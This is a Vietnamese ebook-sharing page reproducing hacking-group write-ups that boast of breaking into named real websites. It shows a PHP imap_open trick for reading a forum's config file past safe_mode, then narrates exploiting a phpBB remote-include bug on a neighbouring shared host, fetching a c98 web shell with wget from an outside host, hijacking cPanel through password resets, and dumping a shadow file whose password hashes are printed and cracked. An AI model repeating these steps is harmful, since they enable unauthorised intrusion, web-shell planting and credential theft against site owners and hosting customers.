1. Trang chủ
  2. » Công Nghệ Thông Tin

Hacker Professional Ebook part 308 pps

6 117 0

Đang tải... (xem toàn văn)

THÔNG TIN TÀI LIỆU

Thông tin cơ bản

Định dạng
Số trang 6
Dung lượng 181,06 KB

Nội dung

safe_mode: ON PHP version: 4.4.2 cURL: ON MySQL: ON MSSQL: OFF PostgreSQL: OFF Oracle: OFF Disable functions : NONE 2. Kiếm path của victim: Đây là bước cũng rất là quan trọng vì nếu muốn đập nhà mà không có địa chỉ làm sao mà đập ? đập vào đâu ? victim nhà ở đâu ? Cách tốt nhất là vào web nó, kiếm những file nó code bị error nên hiện ra path ! thử nào Tình cờ tui vào admincp của nó xem thế nào và có file vbmusic.php gì gì đó click vào : boom trời giúp ta ! hiện ra error file ./global.php is not found ! sht path: để an toàn cho nhactre.biz nên path ở đây được che dấu 1 phần ! Code: /mounted-storage/home19b/sub001/sc19699- SCRXP/nhactre.biz/forum/admincp/vbmusic.php rồi attack nó nào uhmmmmm read file() nó nào rồi php-bypass trong con nr57 không chơi được thử chiêu khác trong con shell cũng không ! lập tức tui vào đọc bài này: https://hcegroup.biz/forums/showthread.php?t=440 rồi, áp dụng liền ! Bây giờ mình cần biết info trong file config của forum nó ! -> /forum/includes/config.php ô php eval() Code: $vnforce = @imap_open("/mounted-storage/home19b/sub001/sc19699- SCRXP/nhactre.biz/forum/includes/config.php", "", ""); $result = @imap_body($vnforce, 1); echo $result; @imap_close($vnforce); sht ra roài hehe ! ngang đây thì chắc không cần nói tiếp nữa ! chúc vui tại HCE ! (c) HcEgRoUp.biz ?> How I Hack Pleikucity.net Hêc ! Ngồi chán chán hẽm biết lêm gì ! Nhớ hồi bữa có hack thằng Pleikucity.net vì lý do xin cái style mê nó hẽmcho ! hêc ! Hacked By : Windak , langtuhaohoa , yeuemdaikho ( hcegroup.net ) Okies ! Bắt đầu nèo Mục tiêu : Pleikucity.net Thông tin đã có về mục tiêu : Sêi shared hosting , Saì Open Source XOOPS ( 2 cái nêy cũng đủ để mần ăn nó rồi ) Sau mê dòng lượn que lượn lại lt cũng nhặt được vêi của rơi của XOOPS : Inclusion file bug: Code: include_once XOOPS_ROOT_PATH.'/language/'.$xoopsConfig['language'].'/misc.php'; Biết lê nó bị remote include file nhưng chã biết khai thác sao cả ! hêc ! Mò 1 hồi vẫn ko biết cách khai thác vì nếu muốn include file thì mình phải có 1 file misc.php trên host của victim nhưng bây giờ chưa có gì trong tay sao mê up file misc.php lên ??? mê nếu đã up được lên rồi thì cần gì sêi bug nêy nữa ??? hì hì ! Thiết nghĩ bug nêy vô dụng nên bỏ qua Chuyển hướng sang local attack thữ xem ( cái trò nêy langtu cũng ko thick chút nêo nhưng buột thế rồi biết sao đây mục đêch của mình lê skin của thằng pleiku để phát triển ý tưởng mê hêc *"18.gif"* ) lach cạch lạch cạch : whois.sc/pleikucity.net > reverse IP > 350 Results for 67.15.40.4 (Pleikucity.net) hêc hêc ! Bây giờ sao đây ?? ngồi dò xem thữ site nêo trong 350 đó dênh bug êh ??? huhuh má ơi hừhm hừhm ! lt chọn phpBB lê mục tiêu vì phpBB có nhiều bug rất củ chuối có thể chiếm được quyền shell ! lụm được khoảng gần chục em sêi phpBB chọn đại 1 thằng vê lt chọn : http://www.sickpuppyrecords.com/ kkhì khì ! loay hoay đâu khoảng 10 phút langtu đã có 1 shell ảo trên host nó thông qua bug remote include file ! hêc ! Vê việc bây giờ lê phải lêm sao up được 1 con remv php lên host để tiện cho việc sữ dụng sau nêy ! OKies Code: ls -al thấy folder uploads của nó chmod 777 nên ta sẽ up vêo đó ! nhưng up nếu up trực tiếp = file .php thì sẽ ko được vì *nix ko chấp nhẪn ! như vẪy ta dùng : Code: cd /uploads Code: wget haylam.com/xxx/c98.zip Code: unzip c98.zip bây giờ thữ xem : http://www.sickpuppyrecords.com/phpBB/uploads/c98.php ặc ặc đã thênh công Vì mới nãy ta up thông qua exploit của forum nên ta cũng có owner tương đương với user của nó lê : sickpupp/sickpupp hihi ! có lẽ đã nhai được cái gì goêi đây , serv nêy config hơi bị củ chuối Code: cat /home/sickpupp/.contactemail OKies ! tiến hênh forgot pass login vêo Cpanel ! hehe ! Có 1 Cpanel rồi lt tênh chơi trò forgot tiếp để vêo thằng Pleiku nhưng ko được Cpanel đã fix ! VẪy đênh thữ get root ? Okies ! Vêo ftp up lên con cgi-telnet rồi "ln " shadow file ra ! OK ! đã ln được shadow file nhưng chỉ có root mới sêi nó được ( điều dĩ nhiên ) Lợi dụng bug của Cpanel 9x loay hoay 1 hồi đã có file shadow trên máy ! hê hê Code: root:$1$.miKBOEg$JfX3vJw.O9FykqZPnURaW1:13126:0:99999:7::: bin:*:12552:0:99999:7::: daemon:*:12552:0:99999:7::: adm:*:12552:0:99999:7::: lp:*:12552:0:99999:7::: sync:*:12552:0:99999:7::: shutdown:*:12552:0:99999:7::: halt:*:12552:0:99999:7::: mail:*:12552:0:99999:7::: news:*:12552:0:99999:7::: uucp:*:12552:0:99999:7::: operator:*:12552:0:99999:7::: games:*:12552:0:99999:7::: gopher:*:12552:0:99999:7::: ftp:*:12552:0:99999:7::: nobody:*:12552:0:99999:7::: rpm:!!:12552:0:99999:7::: vcsa:!!:12552:0:99999:7::: nscd:!!:12552:0:99999:7::: sshd:!!:12552:0:99999:7::: rpc:!!:12552:0:99999:7::: rpcuser:!!:12552:0:99999:7::: nfsnobody:!!:12552:0:99999:7::: mailnull:!!:12552:0:99999:7::: smmsp:!!:12552:0:99999:7::: pcap:!!:12552:0:99999:7::: xfs:!!:12552:0:99999:7::: ntp:!!:12552:0:99999:7::: desktop:!!:12552:0:99999:7::: apache:!!:12552:0:99999:7::: webalizer:!!:12552:0:99999:7::: squid:!!:12552:0:99999:7::: postfix:!!:12552:0:99999:7::: netdump:!!:12552:0:99999:7::: mysql:!!:12552:::::: admin:$1$PrSVkYWg$0C/Hd2YV1U./2ieVlHmom.:13126:0:99999:7::: cpanel:*:12552:::::: mailman:*:12552:::::: fanadmin:$1$qZPyxcUN$RbE9OFyZLvTRU4/JYj2MK0:13103:::::: fuitad14:$1$VHeHhUVS$3MUnZJCjId/o49hJ886aS/:12553:::::: crawfojj:$1$vbD6e7i9$aQfQIS6y2IW8gi9QpJJOv1:12556:::::: vì mục đêch an toên nên ko post hết chỉ tượng trưng thôi oêi ! Mới đi ăn bún riu dưới LTKiệt ( tp.BMT ) về hơi no no Thôi cũng đênh viết tiếp cho kết thúc câu chuyện Điều bây giờ tất yếu phải lêm lê lôi John ra crack shadow pass rồi Chờ khoảng 1 tiếng thấy nó crack được khoảng hơn 40 pass , đợi tiếp , đợi wêi đợi wêi chã thấy ra pass root hay pleiku ! hêc ! Nãy giờ ngồi tiền net hết mẹ gần 7 ngên mê giờ có 5 ngên ! Gồng 2 ngên rồi ! hêc ! Sốt ruột quá , với lại thiết nghĩ sẽ crack ko ra được vì john chỉ crack được những pass đơn giản thôi ! hêc ! Giờ chẳng lẽ quay lại hack lại từ đầu ??? sót tiền net dã man nhưng vì mục tiêu nên quyết định chơi tiếp ! quay lại con cgi-telnet mới nãy mới up : Code: ls -al /home/pleiku/public_html/html/ folder uploads của nó chmod 777 thấy tưởng đâu ngon ăn up 1 em c98 lên ! Up thênh công thấy mừng mừng ! Liên qua browser : http://www.pleikucity.net/html/uploads/c98.php oác oác oác sao lại error 500 ?? hêc ! Thữ up thêm vêi con nữa vẫn error 500 dù file perl hay php hêc ! Cảm thấy đau tiền net rồi nghen Bỏ tiền ra ngồi nãy giờ mê hem lêm được gì lê điên lắm á ! hêc ! Nghĩ đi nghĩ lại sao lại error 500 ?? Phải chăng serv nêy PHP chạy dưới dạng CGI ??? chắc lê thêa rồi ! hêc ! Với lại owner của mình lê sickpupp/sickpupp mê lại up sang chỗ của thằng pleiku/plieku liệu có được ko ?? vì còn noob nên bỏ qua vấn đề nêy ! Quay đi quay lại á chết bê mêy goêi nhá ! Còn nhớ mới nãy ta thấy XOOPS có 1 bug inclusion file ko ???

Ngày đăng: 04/07/2014, 12:20

TỪ KHÓA LIÊN QUAN